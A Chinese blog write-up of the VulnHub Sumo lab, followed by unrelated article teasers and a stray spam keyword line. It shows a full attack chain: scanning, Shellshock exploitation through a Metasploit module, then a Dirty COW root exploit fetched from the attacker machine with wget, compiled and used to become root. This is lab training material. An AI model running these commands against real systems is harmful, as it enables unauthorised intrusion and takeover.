<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之Sumo的實踐

    VSole2023-06-25 09:11:24

    今天實踐的是vulnhub的Sumo鏡像,

    下載地址,https://download.vulnhub.com/sumo/Sumo.zip,

    用workstation導入成功,

    做地址掃描,sudo netdiscover -r 192.168.177.0/24,

    獲取到靶機地址192.168.177.141,

    繼續進行端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.141

    有web服務,進行漏洞掃描,nikto -h http://192.168.177.141,

    發現/cgi-bin/test處存在CVE-2014-6278漏洞,

    用msf搜索漏洞利用方案,采用第一個,

    use exploit/multi/http/apache_mod_cgi_bash_env_exec

    set RHOSTS 192.168.177.141

    set TARGETURI /cgi-bin/test

    exploit

    獲取到msf的shell,

    getuid確認不是root,需要提權,

    sysinfo獲取到系統信息,

    繼續利用臟牛漏洞進行提權,

    kali攻擊機上下載源碼文件,

    wget https://www.exploit-db.com/download/40839,

    改名,mv 40839 dirty.c,

    kali攻擊機上開個http下載,python2 -m SimpleHTTPServer,

    靶機那邊先轉成普通shell,

    shell,python -c "import pty;pty.spawn('/bin/bash')",

    進入臨時目錄,cd /tmp,

    從kali攻擊機上下載源碼文件,

    wget http://192.168.177.138:8000/dirty.c,

    編譯,gcc -pthread dirty.c -o dirty -lcrypt,密碼123456,

    成功后,切換賬戶,su firefart,id確認有root權限,

    本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束。

    sumo
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    vulnhub之Sumo的實踐
    2023-06-25 09:11:24
    今天實踐的是vulnhub的Sumo鏡像,下載地址,https://download.vulnhub.com/sumo/Sumo.zip,用workstation導入成功,做地址掃描,sudo netdiscover -r 192.168.177.0/24,獲取到靶機地址192.168.177.141,繼續進行端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.17
    分析指出,企業很大程度上并不了解自身安全態勢,SIEM普遍檢測不出76%的攻擊戰術、技術與程序(TTP)。
    如何進行云合規監控
    2022-07-20 13:43:25
    未能滿足合規要求可能導致被行業團體開除、巨額罰款,最壞的情況是被起訴。為了應對這些要求,公司的法律部門應該有一份合規標準清單。常見合規標準或法規包括GDPR、Sarbanes-Oxley法案、HIPAA和PCI DSS。其他是運行時考慮因素,這意味著應用程序需要在操作期間進行監視以驗證合規性。團隊必須確定執行和記錄每個適用標準要求的工具。
    如今,非人類(Non-humans)身份可謂無處不在。日常生活中,每天都有很多的非人類實體與我們互動:智能恒溫器程序會在特定時間為房子降溫;手機上的應用程序會向用戶推薦搜索過的信息等等。非人類身份已經滲透到我們生活的方方面面,囊括個人生活和職業生涯。
    DerpnStink靶場
    2023-01-12 11:40:41
    DerpnStink信息收集使用nmap進行深度掃描,發現開放了21和22端口,以及80端口,80端口為wordpress應用,存在wordpress登陸apiNmap scan report for 10.0.3.4
    人們還看到,一些安全主管因隱瞞數據泄露而被判入獄。他們還需要報告安全事件并制定應對計劃。Lehmann表示,企業開始加大力度跟蹤開源軟件,因為他們發現對他們使用的軟件的來源和質量進行未經驗證的信任會造成損害。Iqbal認為,一個良好的AppSec程序應該是軟件開發生命周期的一部分。2023年,防范這些威脅仍將是一個復雜的過程。
    Munro補充說,企業應該調整心態,積極主動地為即將到來的法規做好準備。應該更好地跟蹤開源軟件2021年底爆發的Log4j安全危機在2022年持續了幾乎一整年,影響了全球數以萬計的組織。到2023年,防范此類威脅仍將是一個復雜的過程。網絡安全保險需求可能會繼續增加近年來,網絡安全保險已成為必需品,但保費卻有所增加。此外,組織還面臨著保險公司的更多審查,以確定風險領域。
    痛苦的純文本日志管理日子一去不復返了。雖然純文本數據在某些情況下仍然很有用,但是在進行擴展分析以收集有洞察力的基礎設施數據并改進代碼質量時,尋找一個可靠的日志管理解決方案是值得的,該解決方案可以增強業務工作流的能力。 日志不是一件容易處理的事情,但無論如何都是任何生產系統的一個重要方面。當您面臨一個困難的問題時,使用日志管理解決方案要比在遍布系統環境的無休止的文本文件循環中穿梭容易得多。
    到 2022 年,網絡安全將繼續成為企業領導者的嚴重關切。勒索軟件以及惡意和意外威脅,再加上日益嚴格的數據法規,使公司有責任加強安全和數據使用預防措施。在這里,數據安全領導者分享了他們對未來數據新危險和阻礙它們的機會的看法。
    2021年將成為網絡安全并購活動異常活躍的一年。SecBI公司以其自動化威脅檢測和響應能力而聞名,9月1日,LogPoint宣布已與SecBI方達成收購協議。企業安全提供商Check Point Software Technologies已收購云電子郵件安全公司Avanan。此次收購不僅擴大了 HackerU的地理覆蓋范圍,還將其產品范圍擴大到了所有安全職業點。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类